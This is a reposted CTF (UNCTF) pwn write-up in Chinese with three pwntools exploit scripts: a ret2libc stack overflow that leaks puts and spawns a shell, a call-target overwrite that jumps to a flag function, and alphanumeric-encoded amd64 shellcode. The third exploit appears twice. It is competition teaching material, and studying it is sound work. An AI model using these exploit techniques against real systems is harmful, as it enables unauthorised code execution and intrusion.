UNCTF pwn

简单的一道栈溢出题目：先泄露 libc，然后使用 gadget getshell。
Exp如下:

#name:doudoudedi
#coding:utf-8
from pwn import *
from LibcSearcher import *
def debug():
	"""Attach gdb to the running target ``p`` (module global).

	Only meaningful for the local ``process()`` run; the call site below is
	commented out for the remote run. Python 2 file (see the print statement
	in the second script), so no annotations are used.
	"""
	gdb.attach(p)
#p=process('./pwn4')
# Remote CTF service for this challenge; the commented-out process() line
# above is the local-binary variant of the same script.
p=remote('101.71.29.5',10041)
elf=ELF('./pwn4')
# Fixed addresses taken from the binary: main (used as the return address of
# the first chain so the program restarts cleanly) and a pop-edx gadget
# (named per the writeup). Hard-coding them presumably means the binary is
# not PIE; the chain as written would break under PIE/ASLR of the binary or
# a stack canary in front of the saved return address.
main=0x08048592
pop_edx=0x080483b5
p.recvuntil('!')
# First input: 0x20 bytes of filler plus 'ffff'. What the trailing 'ffff'
# satisfies is not explained on the page.
payload='a'*0x20+'ffff'
p.sendline(payload)
# Second input overflows with 20 bytes of filler (decimal 20 == 0x14, the
# same 0x10+0x4 spelled out below) and returns into puts@plt with puts@got
# as its argument, so the program prints the resolved libc address of puts
# and then returns to main for a second round.
payload='a'*20+p32(elf.plt['puts'])+p32(main)+p32(elf.got['puts'])
p.recvuntil('name?')
p.sendline(payload)
# Reads until a 0xf7 byte and takes the last four bytes as the leak: this
# assumes the top byte of the 32-bit libc mapping is 0xf7 and silently
# misparses the address if that assumption does not hold.
put_addr=u32(p.recvuntil('\xf7')[-4:])
log.success('put_addr: '+hex(put_addr))
# LibcSearcher (third-party) matches the remote libc by the leaked puts
# address; the resolved offsets give the libc base, system and "/bin/sh".
libc=LibcSearcher('puts',put_addr)
libcbase=put_addr-libc.dump('puts')
system_addr=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
#debug()
# Second round repeats the first prompt verbatim ...
payload='a'*0x20+'ffff'
p.sendline(payload)
p.recvuntil('name?')
# ... then overwrites the return address with the pop-edx gadget (popping 0),
# followed by system with 0xdeadbeef as its fake return address and the
# "/bin/sh" pointer as its argument. Why edx is zeroed first is not stated
# on the page.
payload='a'*(0x10+0x4)+p32(pop_edx)+p32(0)+p32(system_addr)+p32(0xdeadbeef)+p32(bin_sh)
p.sendline(payload)
p.interactive()

2.So_so_easy_pwn
也是常规的题目，估计是公用了一个栈空间 call eax（这个忘记了），然后开启了随机化，我们将第四位自己设置即可。
Exp:

Exp:
#name:doudouddi
#coding:utf-8
from pwn import *
#p=process('./pwn')
# Remote CTF service; the commented-out process() line is the local variant.
p=remote('101.71.29.5',10000)
# NOTE(review): libc, system_offset and bin_sh_of are assigned here but not
# referenced anywhere in the rest of this script as shown on the page --
# presumably leftovers from an earlier approach (see the commented-out
# bin_sh log line below).
libc=ELF('./x86_libc.so.6')
elf=ELF('./pwn')
system_offset=elf.symbols['system']
bin_sh_of=0x0B68
def debug():
	"""Attach gdb to the running target ``p`` (module global).

	Local-debugging helper; its call site below is commented out for the
	remote run.
	"""
	gdb.attach(p)
p.recvuntil('the ')
# The service prints an address after "the "; the last six characters of the
# next space-delimited token are parsed as a decimal int, shifted left by 16
# and 0x1000 added, reconstructing the randomized base the writeup describes
# as "setting the fourth byte ourselves".
ads=(int(p.recvuntil(' ',drop=True)[-6:])<<16)+0x1000
# Offset within the reconstructed mapping; presumably the flag-printing
# function, going by the name.
flag_addr=ads+0x09D6
#log.success('bin_sh: '+hex(bin_sh))
p.recvuntil('name?')
# 12 bytes of filler then the address the program ends up calling (the
# writeup guesses via a `call eax`). send(), not sendline(), so no newline
# is appended to the 16-byte input.
payload='a'*12+p32(flag_addr)
print len(payload)  # Python 2 print statement: this file is Python 2
log.success('ads: '+hex(ads))
#debug()
p.send(payload)
p.recvuntil(':')
p.sendline('1')
p.interactive()

3.easy_shellcode
if ( (s[i] <= 64 || s[i] > 90) && (s[i] <= 96 || s[i] > 122) && (s[i] <= 47 || s[i] > 57) && s[i] != 10 && s[i] )
告诉我们只能传数字和字母，然后会写入 shellcode。我们用师傅写的工具将 amd64 的 shellcode 转为纯字母和数字即可。
Exp:
#name:doudoudedi
#coding:utf-8
from pwn import *
from ae64 import AE64
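# This copy of the script was mis-rendered: the string literals carried
# typographic quotes (’ ‘) and the body of debug() read `gdb.attach§`, so it
# was not valid Python. Restored to the plain-ASCII form used elsewhere on
# the page; behaviour is otherwise unchanged.
# Local run of the challenge binary; 64-bit, so asm()/shellcraft emit amd64.
p=process('./pwn3')
context.arch='amd64'
def debug():
	"""Attach gdb to the running target ``p`` (module global)."""
	gdb.attach(p)
p.recvuntil('say?')
# Unconditional gdb attach before sending; comment out for an unattended run.
debug()
# AE64 (third-party) re-encodes an amd64 shellcode into bytes that pass the
# input filter quoted above: only [0-9A-Za-z], '\n' and a NUL terminator
# survive the check.
obj=AE64()
payload=obj.encode(asm(shellcraft.sh()))
log.success('shellcode: '+str(payload))
p.sendline(payload)

p.interactive()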

if ( (s[i] <= 64 || s[i] > 90) && (s[i] <= 96 || s[i] > 122) && (s[i] <= 47 || s[i] > 57) && s[i] != 10 && s[i] )
告诉我们只能传数字和字母，然后会写入 shellcode。我们用师傅写的工具将 amd64 的 shellcode 转为纯字母和数字即可。

Exp:
#name:doudoudedi
#coding:utf-8
from pwn import *
from ae64 import AE64
# Local run of the challenge binary; 64-bit, so asm()/shellcraft emit amd64.
p=process('./pwn3')
context.arch='amd64'
def debug():
	"""Attach gdb to the running target ``p`` (module global).

	Unlike the first two scripts, this one calls debug() unconditionally
	before sending the payload.
	"""
	gdb.attach(p)
p.recvuntil('say?')
# Unconditional gdb attach before sending; comment out for an unattended run.
debug()
# AE64 (third-party) re-encodes an amd64 shellcode into bytes that pass the
# input filter quoted above: only [0-9A-Za-z], '\n' and a NUL terminator
# survive the check.
obj=AE64()
payload=obj.encode(asm(shellcraft.sh()))
log.success('shellcode: '+str(payload))
p.sendline(payload)


p.interactive()


转载自blog.csdn.net/qq_37433000/article/details/102826827